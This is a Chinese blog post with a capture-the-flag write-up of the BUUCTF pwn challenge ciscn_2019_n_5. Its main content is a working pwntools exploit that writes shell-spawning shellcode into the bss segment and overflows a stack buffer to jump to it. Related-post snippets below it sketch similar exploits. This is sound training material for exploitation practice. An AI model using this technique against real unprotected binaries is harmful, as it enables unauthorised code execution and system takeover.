buuctf ciscn_2019_n_5 (ret2shellcode)

最新推荐文章于 2024-07-14 20:14:03 发布
最新推荐文章于 2024-07-14 20:14:03 发布
阅读量1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105661705
版权

无保护,程序直接提供了写入bss,ret2shellcode

在这里插入图片描述
在这里插入图片描述
一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_2019_n_5'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = './libc.so.6'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28445)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims  			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

sh = asm(shellcraft.sh())
p1 = sh
sla('name\n', p1)
name_addr = 0x601080
p2 = flat(['a'*0x28, name_addr])
sla('me?\n', p2)




r.interactive()
真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf ciscn_2019_n_5 ret2shellcode解题思路
weixin_45441024的博客
12-02 373
BUUCTF ciscn_2019_n_5 ret2shellcode check一下,最喜欢的一片红色,64位的程序 发现存在两次输入,那么我们就通过read将构造的shellcode写在栈上,然后在第二次的时候通过构造溢出覆盖返回地址跳转到我们写入shellcode的这个地方,然后就开始构造吧: from pwn import * p=remote('node3.buuoj.cn',25157) sh="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31
FX2N_带AD-DA功能的(32点16入16出花银子的)百分百OK
07-01
5) 新增断电保持功能,更改相关断电保持寄存器,具体如下: 450个数据寄存器:D500--D950 150个计数器: C101--C150 150个定时器: T100--T150 512个内部继电器:M512--M1024 其他寄存器STOP 或者断电将清零 6) ...
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1514
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
ciscn_2019_n_5解题
最新发布
2301_81504456的博客
07-14 558
linux系统命令和理解好程序运行流程。
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 778
[buuctf]ciscn_2019_n_5
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3220
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 335
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 800
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
RETAS_HD_PRO.zip
06-29
图像: BMP, CELD, DGAD, LIF, PICT (*4), PNG, SGI, SKF, SOFTIMAGE, SVD (*1), TARGA, TIFF (*2) 音频: AIFF (*3/*4), WAV (*3/*4) 输出: CELD RETAS是来自日本的二维无纸动画软件,共分为四个模块,TraceMan扫描...
DAC.zip_DAC_HAL_LIB_STM32L452RET6
09-24
在STM32L452RET6中,它具有2个独立的12位DAC通道,可用于驱动模拟输出,如音频、传感器校准或电源控制。 **STM32L452RET6的DAC特性:** 1. **双通道支持**:MCU包含两个独立的DAC通道,DAC1和DAC2。 2. **触发源**...
I2C.zip_HAL_LIB_i2c_联合开发
09-14
在本文中,我们将深入探讨如何在基于STM32L452RET6微控制器的项目中使用I2C(Inter-Integrated Circuit)通信协议,并结合HAL库进行联合开发。I2C是一种流行的串行通信协议,它允许微控制器与各种外围设备如传感器、...
RAE RET程序.rar_RAE RET程序_RET程序_apartmentbh3_rae ret_电调天线
09-24
2. **通信接口**:为了实现与RET设备的交互,RAE RET程序提供了稳定可靠的通信接口。这通常包括串行通信、以太网通信等,保证数据传输的准确性和实时性。 3. **天线调谐**:程序允许用户对电调天线进行精细调谐,...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1649
buuctf ciscn_2019_ne_5题目分析
buuctf ez_pz_hackover_2016(ret2shellcode
carol2358的博客
04-23 797
这题和上次的ret2shellcode不一样,上次的是返回到bss段,这回是返回到栈上,因为本题给出的是栈的一个地址,所以我们通过计算我们输入进去的shellcode对应这个地址的偏移,然后跳到shellcode的栈地址,就可以执行shellcode。 题目大致讲的就是先往s里写数据,然后把s的数据放到dest上,而dest存在栈溢出漏洞 本题的关键就是算出shellcode距离泄漏的s的栈地...
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 578
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1250
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2032
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 234
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 490
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
台达PLC_DVP-ES2编程指南:从基础到高级
2.1-2.16 对于不同的PLC型号(如ES2、EX2、SS2、SA2、SX2、SE),了解其特有的储存区、数据类型(位、半字节、字节、字)、进制转换、以及特殊寄存器如M、S、T、C、HSC、SDR等的应用是编程的关键。 2.17-2.48 M继电...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值